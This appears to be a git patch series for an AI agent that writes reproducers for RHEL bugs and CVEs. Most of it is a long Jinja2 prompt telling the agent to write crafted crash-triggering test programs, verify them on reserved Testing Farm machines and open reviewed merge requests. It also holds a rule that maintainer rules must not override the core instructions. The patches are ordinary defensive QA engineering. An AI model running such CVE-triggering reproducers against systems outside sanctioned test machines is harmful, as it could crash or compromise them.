logger.debug("Tracked TF reservation %s", request_id) + + async def _on_cancel(self, event: ToolSuccessEvent, meta: EventMeta) -> None: + request_id = event.input.request_id if hasattr(event.input, "request_id") else None + if request_id: + self._cancelled.add(request_id) + logger.debug("Tracked TF cancellation %s", request_id) + + async def cleanup(self) -> None: + """Cancel any reserved machines that were not explicitly cancelled.""" + leaked = self._reserved - self._cancelled + for request_id in leaked: + logger.warning("Cleaning up leaked TF reservation %s", request_id) + try: + _testing_farm_api_delete(f"requests/{request_id}") + logger.info("Successfully cancelled leaked TF reservation %s", request_id) + except Exception: + logger.exception("Failed to cancel leaked TF reservation %s", request_id) From 9774017f5e7590773b83c43510c0185b6ae0a5bc Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:56:55 +0200 Subject: [PATCH 12/16] Add reproducer agent Jinja2 prompt template 717-line structured prompt that guides the LLM through the full reproducer workflow: analyzing the Jira issue, designing a BeakerLib test, provisioning a Testing Farm machine, iterating on the test until it reliably demonstrates the bug, and opening a merge request. Extracted as a Jinja2 template to keep the Python agent code focused on orchestration rather than prompt content. Uses template variables for issue metadata, tool names, and configuration. Co-Authored-By: Claude Opus 4.6 --- ymir/agents/prompts/reproducer/prompt.j2 | 717 +++++++++++++++++++++++ 1 file changed, 717 insertions(+) create mode 100644 ymir/agents/prompts/reproducer/prompt.j2 diff --git a/ymir/agents/prompts/reproducer/prompt.j2 b/ymir/agents/prompts/reproducer/prompt.j2 new file mode 100644 index 00000000..f9e714f3 --- /dev/null +++ b/ymir/agents/prompts/reproducer/prompt.j2 @@ -0,0 +1,717 @@ +# Reproducer Skill + +You are a Red Hat Enterprise Linux developer tasked with creating a minimal, automated reproducer for a bug or CVE described in a Jira issue. Your goal is to create a test that objectively demonstrates the bug, verify it on a real RHEL system via Testing Farm, and publish the result. + +You receive your understanding of the bug from the inputs: the Jira issue description, `triage_summary`, `patch_urls`, and `cve_id`. Do NOT perform root cause analysis, source code tracing, or upstream fix hunting. Use the provided `triage_summary` and Jira issue description to understand the bug. + +## Input Arguments + +- `jira_issue`: {{jira_issue}} +- `package`: {{package}} +- `cve_id`: {{cve_id}} +- `patch_urls`: {{patch_urls}} +- `triage_summary`: {{triage_summary}} +- `fix_version`: {{fix_version}} +- `target_branch`: {{target_branch}} +- `dry_run`: {{dry_run}} + +## Tools + +This skill uses the following tools. Do not restrict tool usage — use any tool available as needed. + +**MCP Tools (called via MCP gateway):** +- `get_jira_details` — Get full details of a JIRA issue (fields, comments, links) +- `get_patch_from_url` — Fetch patch/commit content from a URL and return the raw diff (used to read `patch_urls` provided by the caller, NOT for searching for new patches) +- `get_maintainer_rules` — Get maintainer-specific rules and guidelines for a package +- `clone_repository` — Clone a Git repository to a local path +- `fork_repository` — Fork a Git repository (used for MR creation) +- `push_to_remote_repository` — Push a branch to a remote repository +- `open_merge_request` — Open a merge request from a fork against its original repository +- `add_merge_request_labels` — Add labels to a merge request +- `reserve_testing_farm_machine` — Reserve a Testing Farm machine with SSH access +- `get_testing_farm_reservation_details` — Get status and SSH details of a TF reservation +- `cancel_testing_farm_request` — Cancel/release a Testing Farm reservation +- `run_remote_command` — Execute a command on a remote machine via SSH +- `copy_files_to_remote` — Copy files to a remote machine via SCP + +**Local Tools (filesystem, git, analysis):** +- `map_version` — Map RHEL major version to current Y-stream and Z-stream versions. Input: `major_version` (integer, e.g. 9 or 10). Returns `y_stream`, `z_stream`, and `is_maintenance_version`. +- `run_shell_command` — Execute shell commands (git operations, searching) +- `view` — View file or directory contents +- `search_text` — Search for text patterns in files +- `create` — Create new files + +**Other:** +- Bash tool for shell commands (e.g., `git log`, `grep`) + +## Critical Rules + +- **NEVER use direct `git clone` commands.** Always use the `clone_repository` MCP tool for cloning repositories. +- **Do NOT perform root cause analysis, source code tracing, or upstream fix hunting.** Use the provided `triage_summary` and Jira issue description to understand the bug. + +## Reproducer Design Principles + +Every reproducer created by this agent must follow these principles: + +1. **Minimal**: The smallest script that still hits the same code path. Drop unrelated environment setup, users, networks, and configuration. If the bug can be triggered with a three-line input file, do not use a fifty-line one. + +2. **Non-interactive**: Shell script (`.sh`, `.ksh`), one-liner file, or documented `shell -c '...'`. No prompts, no user interaction, no GUI dependencies. + +3. **Heavy setups**: If the bug requires a VM, network topology, or multi-service environment, try to simulate the same failure with a local file, small input, or reduced command sequence first. If that is impossible, state "reproducer blocked" and document what is missing. + +4. **Objective pass/fail**: The reproducer must have a machine-readable pass/fail criterion. Acceptable methods include: + - Exit code (0 = PASS, non-zero = FAIL) + - Exact string match or empty capture vs expected output + - Valgrind: `LEAK SUMMARY` lines with `--errors-for-leak-kinds=definite,indirect --error-exitcode=1` so the process exits non-zero on leaks + - Timeout vs hang (document the timeout value explicitly) + - Signal-based detection (e.g., SIGSEGV, SIGABRT for crash bugs) + +5. **Automation-ready**: The reproducer must work with `git bisect run` and CI pipelines. No hardcoded paths, no assumptions about the user's environment beyond the target RHEL version. + +## Workflow + +Execute the following steps in order. Track state across steps using these variables: + +- `package_name` — the RPM package name (null initially) +- `maintainer_rules` — package-specific rules from maintainer (null initially) +- `jira_data` — full Jira issue data (null initially) +- `tf_request_id` — Testing Farm reservation request ID (null initially) +- `ssh_connection` — SSH connection string for the reserved machine, e.g. `root@1.2.3.4` (null initially) +- `test_dir` — local path to the test directory created in the tests repo clone (null initially) +- `tests_clone` — path to cloned `gitlab.com/redhat/rhel/tests/` repository (null initially) +- `reproducer_verified` — whether the reproducer was successfully verified on TF machine (false initially) +- `iteration_count` — number of verification loop iterations completed (0 initially) +- `merge_request_url` — URL of the created MR in the tests repo (null initially) +- `not_reproducible_reason` — reason the bug could not be reproduced (null initially) + +--- + +### Step 1: Get Jira Issue, Check Package Exists + +1. Call `get_jira_details` with `issue_key` = `{{jira_issue}}`. +2. Save the full result as `jira_data`. Extract key details: + - Title, description, and all comments + - Component name (this is the package name unless `{{package}}` is provided) + - Fix version from `fields.fixVersions[0].name` (if present) + - Any reproducer steps, error messages, or log snippets mentioned in the issue + +3. Determine the package name: + - If `{{package}}` is provided, use it as `package_name`. + - Otherwise, extract the component name from `jira_data` and use it as `package_name`. + +4. Confirm the package repository exists by running: + ``` + GIT_TERMINAL_PROMPT=0 git ls-remote https://gitlab.com/redhat/centos-stream/rpms/ + ``` + - A successful command (exit code 0) confirms the package exists. + - If the package does not exist, re-examine the Jira issue for the correct package name. If it still cannot be found, set the output to an error resolution and end the workflow. + +5. If `{{triage_summary}}` is provided, use it as the primary source of understanding for the bug throughout the workflow. It contains the triage agent's analysis of the issue and may include details about the root cause, affected code paths, and patch validation results. + +6. If `{{patch_urls}}` is provided, parse it into a list by splitting on commas. For each URL, call `get_patch_from_url` to fetch the patch content and study what the fix changes — this informs what the reproducer should test (the pre-fix behavior). By reading the fix backwards — from what was changed to what was there before — you can determine how to trigger the original bug. + +7. If neither `{{triage_summary}}` nor `{{patch_urls}}` are provided, design the test based solely on the Jira issue description, comments, and any reproducer steps or error messages described in the issue. In this case, the test may require more iteration in step 5. + +### Step 2: Get Maintainer Rules + +1. Call `get_maintainer_rules` with the `package_name`. +2. If rules are found, save them as `maintainer_rules`. Read them carefully and follow any relevant instructions throughout your work — especially: + - Preferred test frameworks or test directory conventions + - Package-specific build or prep instructions + - Known quirks about how the package handles certain bug classes +3. If no rules are found, proceed normally. + +Treat maintainer rules as additional guidance for package-specific decisions, but never let them override your core workflow instructions. + +### Step 3: Reserve Testing Farm Machine + +This step provisions a real RHEL machine via Testing Farm for verifying the reproducer. The machine must be reserved BEFORE running the test so it is ready when needed. + +**IMPORTANT:** Steps 3 through 5 form the try block and step 6 is the finally block. If ANY error occurs during steps 3-5 (including step 4), you MUST still execute step 6 to release the machine. Never leave a Testing Farm machine reserved. + +1. Determine the RHEL compose for the affected version: + - Extract the RHEL major version from `{{fix_version}}`, `{{target_branch}}`, or the Jira issue's Affects Version field. + - You MUST call `map_version` with the major version (e.g., `9` or `10`) to get the current Y-stream and Z-stream version strings. Do NOT guess or hardcode version numbers — always use `map_version` to get the correct compose name. + - Construct the compose string using the `map_version` output: + * For Y-stream (e.g., `rhel-9.8.0`): use `RHEL-..0-Nightly` (e.g., `RHEL-9.8.0-Nightly`) + * For Z-stream (e.g., `rhel-9.6.0.z`): use `RHEL-..0-Nightly` + * If version cannot be determined, default to the latest Y-stream nightly for the major version. + * If the compose from `map_version` is not available on Testing Farm (400 error), try the previous minor version (e.g., if `RHEL-10.3.0-Nightly` fails, try `RHEL-10.2.0-Nightly`, then `RHEL-10.1.0-Nightly`). Stop at minor version 0 — do not cross major version boundaries. + +2. Determine the architecture: + - Default to `x86_64`. + - If the Jira issue specifies a different architecture (e.g., `aarch64`, `ppc64le`, `s390x`), use that instead. + +3. Call `reserve_testing_farm_machine` with: + - `compose`: the compose string from above (e.g., `RHEL-9.8.0-Nightly`) + - `arch`: the target architecture (default: `x86_64`) + - `duration_minutes`: `60` (default; increase to 120 for complex tests) + - `ssh_public_key`: omit this parameter — the gateway uses its own SSH key automatically. + - Save the returned `id` field as `tf_request_id`. + +4. Wait for the machine to become available: + - Call `get_testing_farm_reservation_details` with `request_id` = `tf_request_id`. + - This tool polls internally for up to 10 minutes — do NOT add your own polling loop or sleep around it. + - You MUST call this tool EXACTLY ONCE. Never call it a second time. The tool already retries internally. + - Check the result: + * If `ssh_connection` is present and is NOT `"not-yet-available"`: the machine is ready. Save `ssh_connection`. + * If `state` is `"error"`, `"canceled"`, or `ssh_connection` is `"not-yet-available"`: the reservation failed or timed out. You MUST immediately jump to step 6 (cancel the reservation) and then report the error. Do NOT continue to step 4 or step 5. Do NOT retry `get_testing_farm_reservation_details`. + +5. Verify SSH connectivity: + - Call `run_remote_command` with `ssh_host` = `ssh_connection` and `command` = `"cat /etc/redhat-release"`. + - Confirm the machine is running the expected RHEL version. + - If SSH connection fails, retry once after 15 seconds (the machine may still be booting). + +### Step 4: Create tmt Test Structure Locally + +This step creates the tmt-compatible test directory structure locally. The test files will later be copied to the Testing Farm machine for verification (step 5) and committed to the tests repo for the MR (step 7). + +Use the Jira issue description, `triage_summary`, and `patch_urls` to understand the bug and design the test. The patch URLs show what the fix changes — by reading the fix you can determine what behavior to test (the pre-fix, buggy behavior). + +#### 4.1. Clone the Tests Repository + +1. Clone the RHEL tests repository using `clone_repository`: + - URL: `https://gitlab.com/redhat/rhel/tests/` + - Do NOT specify a `branch` parameter — omit it so the tool clones the default branch (it may not be `main`). + - Use a clone path under `/git-repos/` (the shared volume), e.g. `/git-repos/tests-`. + - If the clone path already exists from a previous failed attempt, delete it first with `run_shell_command("rm -rf /git-repos/tests-")` before retrying. + - Save the clone path as `tests_clone`. + +2. Create the test directory: + - For CVEs: `/Security//` + - For bugs (non-CVE): `/Regression//` + - Save the directory path as `test_dir`. + +3. Create the `.fmf/version` file if it does not already exist at the tests repo root: + ``` + mkdir -p /.fmf + echo "1" > /.fmf/version + ``` + +#### 4.2. Create `ai-test-description` + +Create `/ai-test-description` with the following content structure: + +``` +=== Issue Information === +Issue: +Type: + +CVE: + +Package: +Component: +Affected Version: + +=== Analysis === + + + +Fix patches: + + +=== Test Methodology === + + +=== Expected Results === +PASS: +FAIL: + +=== References === + + +``` + +#### 4.3. Create Standalone Test Scripts (`test_*`) + +Based on the bug description from the Jira issue, `triage_summary`, and `patch_urls`, create one or more standalone test scripts. These are the actual programs/scripts that exercise the bug. + +Choose the language based on the package type: +- **C/C++ libraries** (e.g., `libxml2`, `openssl`, `glibc`): write a C program (`test_.c` or `test_.c`) that calls the vulnerable function with crafted input +- **Python packages** (e.g., `python-pillow`, `python-cryptography`): write a Python script (`test_.py`) +- **CLI tools** (e.g., `curl`, `binutils`, `grep`): write a shell script (`test_.sh`) that invokes the tool with triggering arguments +- **Libraries with bindings**: prefer the language closest to the vulnerability (C for a C library even if Python bindings exist) + +Each test script must: +- Be self-contained — no dependencies beyond the package under test and standard system tools +- Accept no interactive input +- Exit with a clear pass/fail signal using an appropriate detection method (see section 4.3.1 below) + +If the test needs crafted input files (malformed images, certificates, config files, etc.), create them as separate files in `test_dir` or generate them inline in the test script. Prefer generating them inline when possible to keep the test self-contained. + +**CRITICAL:** Write standalone test scripts, NOT inline heredocs in `runtest.sh`. The `runtest.sh` BeakerLib harness copies and runs these scripts; it does not contain the test logic itself. + +##### 4.3.1. Choosing the Detection Method + +Based on the bug type (inferred from the Jira issue description and triage summary), choose the appropriate pass/fail approach for your test scripts: + +1. **Crash bugs** (null pointer dereference, buffer overflow, use-after-free): + - Detection: process exits with signal (SIGSEGV, SIGABRT, SIGBUS) + - Method: run the program and check exit code; non-zero or signal = bug present + - Enhancement: use AddressSanitizer (`ASAN_OPTIONS`), Valgrind, or `GLIBC_TUNABLES=glibc.malloc.check=3` (for glibc 2.34+) to make detection more reliable + +2. **Memory leak bugs**: + - Detection: Valgrind `LEAK SUMMARY` with `--errors-for-leak-kinds=definite,indirect --error-exitcode=1` + - Alternative: pmap RSS growth over repeated runs (document which method is authoritative) + +3. **Logic bugs** (wrong output, incorrect behavior): + - Detection: compare program output against expected output + - Method: exact string match, diff, or specific pattern in output + +4. **Hang / infinite loop bugs**: + - Detection: process does not terminate within a timeout + - Method: `timeout s ` and check exit code 124 (timeout) + +5. **Information disclosure bugs**: + - Detection: program outputs data it should not + - Method: check for presence of sensitive data in output + +6. **Denial of service bugs** (excessive resource consumption): + - Detection: resource usage exceeds threshold + - Method: measure CPU time, memory, or disk usage + +#### 4.4. Create `runtest.sh` (BeakerLib Harness) + +Create `/runtest.sh` as an executable BeakerLib test harness (`chmod +x`). The harness follows this structure: + +```bash +#!/bin/bash +# SPDX-License-Identifier: GPL-2.0-or-later +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +# +# runtest.sh of +# Description: +# Author: Ymir AI Agent +# +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +. /usr/share/beakerlib/beakerlib.sh || exit 1 + +PACKAGE="" + +rlJournalStart + rlPhaseStartSetup + rlAssertRpm "$PACKAGE" + rlRun "TmpDir=\\$(mktemp -d)" 0 "Creating tmp directory" + ORIG_DIR="$(pwd)" + rlRun "pushd \\$TmpDir" + # Copy test scripts and any input files to TmpDir + rlRun "cp \\$ORIG_DIR/test_* \\$TmpDir/" 0 "Copying test scripts" + # + # rlRun "gcc -o test_ test_.c $(pkg-config --cflags --libs ) -Wall" 0 "Compiling test program" + # + # rlRun "dnf install -y " 0 "Installing dependency" + rlPhaseEnd + + rlPhaseStartTest "" + # Run the reproducer and check the result + # + + # Example for crash bug: + # rlRun "./test_ " 0 "Program should not crash with fix applied" + + # Example for logic bug: + # rlRun "output=\\$(./test_.sh)" 0 "Running reproducer" + # rlAssertEquals "Output should match expected" "\\$output" "" + + # Example for memory bug: + # rlRun "valgrind --errors-for-leak-kinds=definite,indirect --error-exitcode=1 ./test_" 0 "No memory leaks" + + # Example for hang bug: + # rlRun "timeout 10s ./test_.sh" 0 "Program should complete within 10 seconds" + rlPhaseEnd + + rlPhaseStartCleanup + rlRun "popd" + rlRun "rm -rf \\$TmpDir" 0 "Removing tmp directory" + rlPhaseEnd +rlJournalPrintText +rlJournalEnd +``` + +Key rules for `runtest.sh`: +- `ORIG_DIR="$(pwd)"` must be set before `pushd` so test files can be copied to `$TmpDir`. +- The `rlRun` exit code check reflects the **fixed** behavior: `rlRun "command" 0` means PASS when the command exits 0 (fix applied, no crash). When the bug is present, the command will exit non-zero or crash, causing the test phase to FAIL. +- For crash bugs where you expect a signal: use `rlRun "command" 0` — when the fix is applied the program should not crash (exit 0), and when the bug is present it will crash (non-zero exit). +- For tests that need compilation: install `gcc`, `make`, and development headers in the Setup phase. +- Keep the harness minimal — all test logic belongs in the standalone `test_*` scripts. + +#### 4.5. Create `main.fmf` (FMF Metadata) + +Create `/main.fmf` with appropriate metadata: + +For CVE tests: +```yaml +summary: Security test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies + # - gcc (if test needs compilation) + # - valgrind (if using valgrind detection) +duration: 10m +tag: + - + - Security + - CVE +tier: "1" +``` + +For bug (regression) tests: +```yaml +summary: Regression test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies +duration: 10m +tag: + - + - Regression +tier: "1" +``` + +Adjust `duration` based on the test complexity. Use `5m` for simple tests, `10m` for standard tests, and `30m` for tests that require compilation, large inputs, or Valgrind. + +### Step 5: Copy Reproducer to TF Machine, Run, Iterate + +This is the agentic verification loop — the core of the agent. The goal is to verify that the reproducer actually detects the bug on a real RHEL system. This step iterates: copy the test, run it, analyze the result, fix issues, and try again. + +**Iteration limit:** Maximum 5 iterations. If the reproducer cannot be verified after 5 attempts, stop and report the bug as not reproducible (with documentation of what was tried). + +#### 5.1. Copy Test Files to the TF Machine + +1. Call `copy_files_to_remote` with: + - `ssh_host`: `ssh_connection` (from step 3) + - `local_paths`: list of all files in `test_dir` (e.g., `["/runtest.sh", "/test_.c", "/main.fmf", "/ai-test-description"]`) + - `remote_dir`: `/tmp/reproducer` + +2. Verify the copy succeeded by listing the remote directory: + ``` + run_remote_command(ssh_host=ssh_connection, command="ls -la /tmp/reproducer/") + ``` + +#### 5.2. Install Dependencies and Prepare the Environment + +1. Install the package under test and any dependencies on the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y beakerlib ") + ``` + +2. If the test requires compilation (C test program), install build tools: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y gcc make ") + ``` + +3. If the test requires Valgrind: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y valgrind") + ``` + +4. Record the installed package version for the report: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q ") + ``` + +#### 5.3. Run the Reproducer + +1. Make the test scripts executable: + ``` + run_remote_command(ssh_host=ssh_connection, command="chmod +x /tmp/reproducer/runtest.sh /tmp/reproducer/test_*") + ``` + +2. Run the BeakerLib test harness: + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./runtest.sh", timeout=600) + ``` + +3. Alternatively, if running the standalone reproducer directly (for faster iteration during debugging): + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./ ", timeout=300) + ``` + +4. Capture the output, exit code, and any signals from the command result. + +#### 5.4. Analyze the Result + +Compare the output and exit code against the expected detection behavior: + +**Case A: Bug is REPRODUCED (test FAILS as expected — the bug is present)** +- The detection method fires: crash detected, wrong output observed, timeout hit, memory leak found, etc. +- This means the reproducer WORKS. The test correctly detects the bug on the unpatched system. +- Set `reproducer_verified` = true. +- Proceed to step 6 (return machine), then step 7 (create MR). + +**Case B: Bug is NOT reproduced (test PASSES — the bug is not triggered)** +- The program does not crash, output is correct, no timeout, no leak, etc. +- This means EITHER the reproducer is wrong OR the bug is not present on this system. +- Continue to 5.5 (iterate). + +**Case C: Test execution error (unrelated failure)** +- The test fails for a reason unrelated to the bug: missing dependency, compilation error, permission denied, wrong path, syntax error, etc. +- These are test bugs, not reproduction failures. +- Continue to 5.5 (iterate) — fix the test, not the detection method. + +**Important:** On a system WITHOUT the fix applied, a working reproducer should FAIL (Case A). The `rlRun "command" 0` in BeakerLib expects exit code 0 (fixed behavior). When the bug is present, the command exits non-zero, causing the BeakerLib phase to report FAIL. This FAIL means the reproducer is working correctly — it detected the bug. + +#### 5.5. Iterate on Failure (Cases B and C) + +If the reproducer did not detect the bug, increment `iteration_count` and analyze why. The analysis depends on the failure mode: + +**For Case B (bug not triggered):** + +1. **Check the package version**: Is the installed version actually vulnerable? If the system already has the fix, the test will PASS (correctly). Verify: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q --changelog | head -30") + ``` + If the fix is already applied on this compose, the test will not reproduce the bug. This is an expected outcome — note it and consider using an older compose, or document that the fix is already present and the reproducer is validated by the test's PASS/FAIL design. + +2. **Check trigger conditions**: Review whether the test correctly exercises the bug: + - Is the correct binary/library being tested? (Check `which `, `rpm -qf $(which )`) + - Are the right flags/options being used? + - Is the input data correctly crafted? (Examine it on the remote machine) + - Are environment variables or configuration settings correct? + +3. **Check the detection method**: Is the test checking for the right signal? + - For crash bugs: is the program actually crashing but being caught by a signal handler? Try running under `gdb` or checking `dmesg` / `journalctl` for segfault records. + - For logic bugs: is the expected output format wrong? Run the command manually and inspect actual output. + - For memory bugs: are you using the right Valgrind options? + +4. **Refine the test**: Based on the analysis, modify the test: + - Adjust input data (different size, different malformed fields, different structure) + - Add or change command-line flags + - Modify preconditions (create specific files, set environment variables) + - Try a different approach to triggering the bug + - Simplify — remove unnecessary complexity that might mask the bug + +**For Case C (test execution error):** + +1. **Fix compilation errors**: Read the error output, fix the test source code +2. **Fix missing dependencies**: Install additional packages +3. **Fix path issues**: Correct file paths, ensure scripts are executable +4. **Fix syntax errors**: Correct shell or program syntax +5. **Fix permission issues**: Adjust file permissions or run as appropriate user + +**After modifying the test:** + +1. Update the test files in `test_dir` locally (edit the files in place). +2. Re-copy the updated files to the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="rm -rf /tmp/reproducer/*") + copy_files_to_remote(ssh_host=ssh_connection, local_paths=[], remote_dir="/tmp/reproducer") + ``` +3. Re-run the reproducer (go back to 5.3). +4. If `iteration_count` >= 5, stop iterating and proceed to 5.6. + +#### 5.6. Handle Non-Reproducible Bugs + +If the bug could not be reproduced after the maximum number of iterations: + +1. Set `reproducer_verified` = false. +2. Document what was tried in each iteration: + - What trigger conditions were tested + - What the output/exit code was in each attempt + - What changes were made between iterations + - Why each attempt failed to reproduce the bug +3. Determine the likely reason for non-reproducibility: + - **Fix already applied**: the compose already includes the fix + - **Race condition**: requires specific timing that cannot be reliably triggered + - **Environment-specific**: requires hardware, kernel, or configuration not available on the TF machine + - **Complex preconditions**: requires a multi-service setup that cannot be simulated + - **Insufficient information**: the Jira issue and triage summary did not provide enough detail to design an effective trigger +4. Save the documentation as `not_reproducible_reason` for the output schema. +5. Propose setting Test Coverage to "Regression Only" in the Jira comment. + +### Step 6: Return Testing Farm Machine + +**CRITICAL:** This step MUST always execute, regardless of whether steps 3-5 succeeded or failed. Treat the entire step 3-5-6 sequence as a try/finally block — step 6 is the `finally`. + +1. If `tf_request_id` is set (a machine was reserved): + - Call `cancel_testing_farm_request` with `request_id` = `tf_request_id`. + - Log whether the cancellation succeeded or failed (but do not halt the workflow on failure). + +2. If `tf_request_id` is not set (reservation was never made or failed before returning a request ID), skip this step. + +3. Clear `ssh_connection` to prevent accidental reuse. + +Even if the reproducer verification succeeded, the machine must be returned. Even if an unrelated error occurred, the machine must be returned. Even if the agent is about to report an error, the machine must be returned. There are no exceptions. + +### Step 7: Create Merge Request (only if reproducer works) + +This step publishes the verified reproducer test as a merge request to the RHEL tests repository. Only execute this step if `reproducer_verified` is true AND `{{dry_run}}` is not true. + +If `reproducer_verified` is false, skip this step entirely. +If `{{dry_run}}` is true, skip this step but log what would have been created. + +#### 7.1. Prepare the Branch + +1. In the `tests_clone` directory, create a working branch: + ``` + git -C checkout -B reproducer/ + ``` + +2. Make shell scripts executable before staging (git tracks file mode): + ``` + chmod +x //runtest.sh //*.sh //*.ksh + ``` + +3. Stage all test files: + ``` + git -C add / + ``` + +4. Commit with a descriptive message: + ``` + : add reproducer for + + in ."> + in ."> + + + + Resolves: + + This test was created by Ymir, a Red Hat Enterprise Linux software maintenance AI agent. + + Assisted-by: Ymir + ``` + +#### 7.2. Fork, Push, and Create MR + +1. Fork the tests repository by calling `fork_repository` with: + - `repository`: `https://gitlab.com/redhat/rhel/tests/` + - Save the returned `fork_url`. + - If `fork_repository` fails (the tool returns an error), set `merge_request_url` to null, include the error message in the output `summary`, and skip the rest of step 7 entirely. Proceed directly to producing the output JSON. The reproducer test files are still valid in `test_dir` — only the MR creation is skipped. + +2. Push the branch by calling `push_to_remote_repository` with: + - `repository`: the fork URL from above + - `clone_path`: `tests_clone` + - `branch`: `reproducer/` + - If push fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +3. Create the merge request by calling `open_merge_request` with: + - `fork_url`: from above + - `title`: `: add reproducer for ` + - `source`: `reproducer/` + - `target`: the default branch of the tests repository (check with `run_shell_command("git -C symbolic-ref refs/remotes/origin/HEAD --short")` and strip the `origin/` prefix) + - `description`: + ``` + ## Summary + + in ."> + in ."> + + + + ## Pass/Fail Criteria + + - **PASS**: + - **FAIL**: + + ## Verification + + Verified on Testing Farm (request ID: ). + The reproducer successfully on (). + + ## Test Structure + + - `ai-test-description` — issue analysis and test specification + - `runtest.sh` — BeakerLib test harness + - `main.fmf` — FMF metadata + - `test_*` — standalone reproducer script(s) + + Resolves: + + --- + + > **Warning: AI-Generated MR**: Created by Ymir AI assistant. AI may make mistakes + or produce incorrect test logic. **Carefully review the test before merging. + Human RHEL QE needs to approve this contribution before merging.** + > + > By merging this MR, you agree to follow the Guidelines on Use of AI Generated Content + and Guidelines for Responsible Use of AI Code Assistants. + + ## Want to make changes to this MR? + + You can check out the source branch from the fork and push your changes directly. + + ## Customize Ymir's behavior for your package + + If there is anything that could be adjusted regarding Ymir's behavior + and is specific to your package, you can submit an MR to + gitlab.com/redhat/centos-stream/rules/. + See the customization docs for details. + + ## Questions or Issues? + + **Contact:** redhat-ymir-agent@redhat.com | **Slack:** #forum-ymir-package-automation | + **Report AI Issues:** Jira (project: Packit, component: jotnar) or GitHub + ``` + - If MR creation fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +4. Save the returned MR URL as `merge_request_url`. + +5. Add the reproducer label by calling `add_merge_request_labels` with: + - `merge_request_url`: the MR URL from above + - `labels`: `["ymir_reproducer"]` + +--- + +**Note:** Do NOT post a Jira comment yourself. The workflow handles Jira commenting +automatically after you return your output. Focus on producing accurate output fields. + +--- + +## Output Schema + +The final output must be a JSON object: + +```json +{ + "jira_issue": "RHEL-12345", + "success": true, + "reproducer_type": "cve", + "test_mr_url": "https://gitlab.com/redhat/rhel/tests/ksh/-/merge_requests/123", + "testing_farm_request_id": "tf-request-abc123", + "pass_fail_criteria": "PASS: program exits 0 (fix applied, no crash). FAIL: program exits with SIGSEGV (bug present, buffer overflow triggered).", + "summary": "Created reproducer for CVE-2025-12345 in libfoo. The vulnerability is a heap buffer overflow in parse_header() triggered by a malformed PNG with chunk length > 0x7fffffff. Test sends crafted input and checks for crash via exit code.", + "not_reproducible_reason": null +} +``` + +On failure or non-reproducible result: + +```json +{ + "jira_issue": "RHEL-12345", + "success": false, + "reproducer_type": "bug", + "test_mr_url": null, + "testing_farm_request_id": "tf-request-xyz789", + "pass_fail_criteria": "PASS: command completes within 10s. FAIL: command hangs (timeout after 10s).", + "summary": "Attempted to reproduce RHEL-12345 (infinite loop in parser). The bug requires a specific interleaving of concurrent requests that could not be reliably reproduced in 5 attempts on a single-core TF machine.", + "not_reproducible_reason": "Race condition requires multi-threaded workload with specific timing. Attempted with stress-ng and taskset but could not trigger the hang reliably." +} +``` + +The output fields: +- `jira_issue` (string) — the Jira issue key (upper-case) +- `success` (bool) — whether a working reproducer was created and verified +- `reproducer_type` (string) — `"cve"` or `"bug"` +- `test_mr_url` (string or null) — URL of the merge request in the tests repository (null if not created) +- `testing_farm_request_id` (string or null) — Testing Farm request ID used for verification +- `pass_fail_criteria` (string) — human-readable description of what PASS and FAIL mean +- `summary` (string) — concise description of the reproducer +- `not_reproducible_reason` (string or null) — explanation if the bug could not be reproduced (null on success) From 8d79192badad0ee105a852e7eb745470530cecda Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:57:04 +0200 Subject: [PATCH 13/16] Add BeeAI reproducer agent orchestration MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Main agent module that wires together the reproducer workflow: - Dedup guard: checks Jira labels before starting to prevent duplicate runs across concurrent deployments - Tool registration: assembles the MCP gateway tools (GitLab, Testing Farm, SSH) with Jira and file-access tools - TF cleanup middleware: attaches crash-recovery reservation tracking - Structured output: parses LLM response into ReproducerOutputSchema - Retry logic: up to 3 attempts on transient LLM/tool failures - Jira lifecycle labels: marks issues through queued → in-progress → done/failed/error states Co-Authored-By: Claude Opus 4.6 --- ymir/agents/reproducer_agent.py | 516 ++++++++++++++++++++++++++++++++ 1 file changed, 516 insertions(+) create mode 100644 ymir/agents/reproducer_agent.py diff --git a/ymir/agents/reproducer_agent.py b/ymir/agents/reproducer_agent.py new file mode 100644 index 00000000..2d545f64 --- /dev/null +++ b/ymir/agents/reproducer_agent.py @@ -0,0 +1,516 @@ +import asyncio +import logging +import os +import sys +import traceback +from textwrap import dedent + +from beeai_framework.agents.requirement.requirements.conditional import ( + ConditionalRequirement, +) +from beeai_framework.errors import FrameworkError +from beeai_framework.memory import UnconstrainedMemory +from beeai_framework.middleware.trajectory import GlobalTrajectoryMiddleware +from beeai_framework.tools.think import ThinkTool +from beeai_framework.utils.strings import to_json +from beeai_framework.workflows import Workflow +from pydantic import BaseModel, Field + +import ymir.agents.tasks as tasks +from ymir.agents.observability import setup_observability +from ymir.agents.reasoning_agent import ReasoningAgent +from ymir.agents.tf_cleanup_middleware import TFReservationCleanupMiddleware +from ymir.agents.utils import ( + build_agent_factory_with_mock_repos, + get_agent_execution_config, + get_chat_model, + get_tool_call_checker_config, + init_sentry, + is_reasoning_enabled, + mcp_tools, + render_template, + resolve_chat_model_override, +) +from ymir.common.base_utils import fix_await, redis_client +from ymir.common.constants import 